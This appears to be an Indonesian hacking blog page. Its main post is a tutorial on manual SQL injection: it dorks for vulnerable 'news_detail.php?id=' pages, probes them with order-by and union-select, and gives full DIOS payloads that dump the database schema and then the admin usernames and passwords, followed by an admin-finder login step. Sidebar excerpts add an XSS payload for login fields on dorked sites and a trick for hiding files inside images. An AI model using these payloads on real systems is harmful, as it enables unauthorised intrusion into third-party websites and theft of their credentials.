Skip to main content

solusi xss game level 2

sql injection with Dios

Sql injection manual with DIOS
Assalamualaikum, ketemu lagi dengan saya lelaki idaman para women :v kali ini saya akan memberikan tutorial sql injection manual with Dios. 
siapkan: 
  1. Dork sebanyak mungkin
  2. Browser
  3. Dios(dump in One shot)
  4. Admin finder
  5. Minuman bila haus & makanan bila lapar :v
Ok, langsung saja cuss ke tutorialnya.

Dork dari saya (inurl:news_detail.php?id=)

  • Masukkan dorknya ke pencarian
  • Lalu pilih target

  • Lalu beri tanda petik satu ( http://example.com/news_detail.php?id=12' ) jika muncul tulisan error / blank web berarti web vuln
  • Dan saatnya mencari angka table yang vuln menggunakan order by(http://example.com/news_detail?id=12+order+by+1--+-)dan seterusnya hingga menemukan angka table yang vuln
  • Jika sudah menemukan angka table yang vuln saatnya mengganti order by dengan union select(http://example.com/news_detail?php.id=-12+union+select+1,2,3,4,5--)urutkan angka table hingga ke angka table yang vuln
  • Maka akan muncul angka ajaib jika angka ajaibnya 2 maka ganti angka 2 yang tadi dengan Dios(http://example.com/news_detail.php?id=-12+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x),3,4,5--)maka akan muncul nama table, schema database dan nama coloumn
  • Jika sudah muncul misal user & pass adminnya ada di database yang bernama users dan table yang bernama use_ussername & use_pass(http://example.com/news_detail.php?id=-12+union+select+1,(select(@x)from(select(@x:=0x00),(select(0)from(users)where(@x:=concat+(@x,0x3c62723e,use_username,0x203a3a20,use_pass))))x),3,4,5--)maka akan muncul ussername dan password milik admin.
  • Dan selanjutnya tinggal cari admin log-in menggunakan admin finder.
Sekian dari saya ucapkan mohon maaf bila ada salah kata bila ada yang kurang boleh ditambahkan

Comments

Popular posts from this blog

Apa Itu Reconnaissance?

Assalamualaikum para penikmat rindu :D ,come back with me dalam acara heker ko toxic.
Ok...seperti yang kmaren dah gw jelasin disini gw bakalan lanjutin materi yang kemaren tentang Cara Kerja Cyber Crime Dalam Mencyduk dan Menangkap Mangsanya. Dan seperti yang sudah gw sebutin cara yang paling efektif dan biasa digunakan yaitu adalah dengan cara Reconnaissance. "Apa sih Reconnaissance itu?", So Langsung saja ea Reconnaissance adalah suatu metode persiapan yang digunakan sekelompok attacker atau hacker dalam melakukan penyerangan atau penyergapan kepada si target dengan cara mengumpulkan informasi2 detail dari target yang ingin kita recon, Teknik ini akan menyertakan network scanning baik melalui jaringan internal atau external yang tentu saja tanpa mengantongi izin (ilegal).

Ada dua jenis model reconnaissance yang dikenal, yaitu yang bersifat pasif dan aktif. Usaha terkait dikatakan pasif apabila tidak ada interaksi langsung antara pihak penyerang dengan target atau sasaran ya…

cara membuat steganography lewat termux

Ok, kali ini saya akan memberikan tutorial cara membuat steganography lewat termux. Ok, langsung saja siapkan: TermuxRAR/aplikasi sejenisnyaGambarDan file berekstensi .txt Ok langsung saja ke tutorialnya disini saya sudah menyiapkan file berekstensi .txt nya
Buka aplikasi RAR nyaKompres file txtnya menjadi rarBuka termuxnyaLalu ketikkan cd /storage/emulated/0/steganographySteganography yang saya garis bawahi itu adalah folder saya
Lalu ketikkan cat test.jpg file.rar>hasil.jpgLalu cek di file manager Test.jpg adalah gambar saya 
File.rar adalah file txt yang telah di kompres menjadi rar Hasil.jpg adalah hasilnya
Catatan: gambar dan file txtnya disimpan dalam satu folder 
Sekian dari saya jika ada salah kata mohon di maafkan

Xss pada halaman login

pada artikel sebelumnya saya memberikan tutorial xss via upload file dan kali ini saya akan memberikan tutorial xss pada halaman login.

Dork: inurl:/login.php
Payload xss:
<script>alert("hacked_by_Ancient_One")</script>

1. Dorking menggunakan dork diatas
2. Pilih salah satu target
3. Maka akan ada halaman login seperti biasa
(halaman login)
 4. Masukkan payload xss pada kolom username
(payload xss pada kolom username)
5. Jika sukses maka akan memuncul kan alert
(sukses)
Sekian dari saya jika ada salah kata mohon maaf, selamat mencoba